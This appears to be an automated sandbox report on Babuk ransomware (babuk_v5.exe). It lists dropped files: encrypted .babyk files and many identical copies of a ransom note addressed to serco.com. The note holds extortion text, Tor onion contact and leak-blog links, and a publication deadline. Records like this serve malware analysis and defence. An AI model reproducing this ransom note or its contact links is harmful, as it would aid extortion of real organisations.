                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.501206726929283
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlVQJJbU/5l2JtTAuDMrigvt9F4jYpDwt1tmJoD7K0EuzqgshfEUlG9UxNvEEn:FQJJQc5AuD62jYpsLt+kv2gM00vtn
                                                                            MD5:D90799B6186557571E16AD329854B86F
                                                                            SHA1:C0758EC199893EB0060DD4878DFD857ACAF4A16C
                                                                            SHA-256:4A21140D3B8D5EEF640894034F7A733D460AEC8532FEF54D18F1403745AC19A0
                                                                            SHA-512:964995FDB5470C8B0891CA036D5A2CD1FEACEAB778FE868D37EFF6B0820CD7BB4C7D26384CD6CD59C90A9488AD00A71B478605AE45B46690403752B99B36546D
                                                                            Malicious:false
                                                                            Preview: ..........l....)1.h.......H.B%7.ht......;.H.u@{..'...1.).=..QL.....H..P.d....<.Z...Z....8..@..G........PE.:...h..~..hR.o2!x.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.975153723560495
                                                                            Encrypted:false
                                                                            SSDEEP:192:BZ+ZqK6YXUAQoYE3cFQYKvUAwxjAnj8Utt31JB7k:BkZkYZQxE3cNS5RnQc1J1k
                                                                            MD5:A0D9F6687229121106E811C7A5C51FA8
                                                                            SHA1:A02E11ED145981B617703481F580100A74BFBBD0
                                                                            SHA-256:B7878207A07E96D6253C3FA89F20C596CDFDADCB55C8C605C458181E1DB858DB
                                                                            SHA-512:B498B93C92500A71A913C8724392670895E31FE859CB1F5D2287A5B1B94208C2A46E36D0C7738FB188D2308DBF46412C59C3CF0EDF65A9B091942783EB83CC19
                                                                            Malicious:false
                                                                            Preview: ...q..y.%.W....nYyf....W..q......f.i.......j.".....7......s<..].m...*Y........K....}.)...[.../.d......N]0..C..5..p2.......s/26E^$0M...|A#'~>..:../..F.P2Y.1...*...~...!..~}H2...q.]...uAb.'..l.Nm.....W..Z.)....]..F1..az...H.`....k\_....Z.X3......i.....0..+..qE.V]p.....o..^P......y...\.j..#......H.......]..;.....%.r+.{Z....(..X..8+.:.Fl8;-z...N.+$.W..M.....J...~.m..Yep..?}......u...!..(zW.....%..2.E...u).^i.p....6H.|.I.%...R....;.X....p.(x.-...8.|dRM....U....l*J.w.S..........}^...O}U.....\.8.V.....w.u............)..%..w.b!^,...V.'J!......}...i.......k.....H....AqL1.....,..1..i.s.y...I.4..:`.J.:7....*....'......j.#..K..#..(x..w...R7...H...~.X.c!....g5^6..4...x.s..>..9..HC....'.~`.=.#..?....QZ.........,.:..]...|....Xf"..ocb.W'...."...8M..+..../........S.et...I.R......\.i`..W.;.w;......oE...C..?'.m...|v~..4...D.u.\..).....os{YC..a^..U._.]..*...b..y#L..~.W...6...%.&m.mh..F#....F"u#...!....s.^.....s.%M.MKU....+,......Q.z..P.p#.`*@7.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.622078789348674
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlwOBv078IK6otEuNC1HUSYcMzIcge3JIXTuJ9UxNvEEn:gOZ0gIfotEOgHUr9kBe5IXTA0vtn
                                                                            MD5:39C2C22BB4CE1FF03963BF079DDC2098
                                                                            SHA1:ACBD455839CDF0C222FF777F0A4C3528BA994654
                                                                            SHA-256:963199565D364702EC1439D8C7A47139B535D40CE354F860FC663C28EE8717DA
                                                                            SHA-512:730034EF3B2F3B352072B56B7A618F3C1C26DDBE5705927B905239DCDECC0065358B9FF17FEC8EFB08B6311D32CEF0A7FAFEFB8D1CA24E837D61EED42E0093EE
                                                                            Malicious:false
                                                                            Preview: ....i.,...._..I..4M.1...9S...1;.Q...........>'D...*.C.6...k..".......L....9..B.ZN.|G.=....21.\....a..U.-...`'K.o\...!...|W..y....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977399883306356
                                                                            Encrypted:false
                                                                            SSDEEP:192:Wk4WXEICvmvEGn89ODOo1fIwCRrPmIcIbDRsqsErOrEkc2ZLPf:JFhCvmv1OoURruIcm+tEqr91xPf
                                                                            MD5:AA8D19DD00D1227186F1BB2ABCDD38B8
                                                                            SHA1:186111A37202C516D764FF5BCF82948DE02AF0CE
                                                                            SHA-256:E7D79A479D48AC9086AF6CEF38F827357F6C9C7881185336591EB04DD8CD6D96
                                                                            SHA-512:F12266DD94E988AF265DADB4A2450A48281377CA285CFC33207BC0B563F0CE43E343DF45C148135EA4478BBEB5006C2CA95CE006DE9D2244B9BED9D472505A92
                                                                            Malicious:false
